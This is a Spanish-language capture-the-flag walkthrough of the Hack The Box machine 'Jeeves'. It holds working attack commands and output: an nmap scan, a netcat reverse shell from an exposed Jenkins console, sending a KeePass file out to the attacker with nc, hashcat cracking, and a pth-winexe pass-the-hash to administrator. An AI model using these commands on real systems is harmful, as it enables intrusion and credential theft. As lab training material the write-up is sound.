Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins.
Nmap scan report for 10.10.10.63 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Ask Jeeves 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-20 01:23:12 |_ start_date: 2019-10-20 01:21:48 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 86.72 seconds
Si usamos el dirbuster en 50000 vemos el folder askjeeves
Si entras es un administrador de Jenkins
desde ahi se puede ejecutar windows creando un proyecto. Vamos a bajar NC y llamar de vuelta.
root@Kali2:~/Downloads# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.63] 49677 Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Users\kohsuke\Desktop>more user.txt more user.txt e3232272596fb47950d
Para ser admin tienes que encontrar el archivo CEH.kdbx (keeppass)
Lo transferimos de windows a linux con:
C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx
Lo recibimos con:
root@Kali2:~/Downloads# nc -lp 1235 >jeeves.kdbx
Extraemos el hash con John
root@Kali2:~/Downloads# keepass2john CEH.kdbx CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Copiamos todo menos “CEH:” a un archivo nuevo y lo crakeamos usando hashcat y rockyou
root@Kali2:~/Desktop# hashcat -m 13400 hashcatjeeves /usr/share/wordlists/rockyou.txt --force hashcat (v5.1.0) starting... Session..........: hashcat Status...........: Running Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES) Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48 Time.Started.....: Sat Oct 19 21:15:25 2019 (38 secs) Time.Estimated...: Sun Oct 20 03:02:58 2019 (5 hours, 46 mins) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 688 H/s (15.90ms) @ Accel:256 Loops:64 Thr:1 Vec:8 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 25600/14344385 (0.18%) Rejected.........: 0/25600 (0.00%) Restore.Point....: 25600/14344385 (0.18%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5504-5568 Candidates.#1....: joey1 -> 220292 $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
Si usamos keepass2 podemos extrar el NLTM y passar el hash
root@Kali2:~/Desktop# pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Users\Administrator\Desktop>whoami whoami jeeves\administrator
Y listo, espero que no estén así de difíciles los de OSCP ja. Pero bueno ya tengo otra box.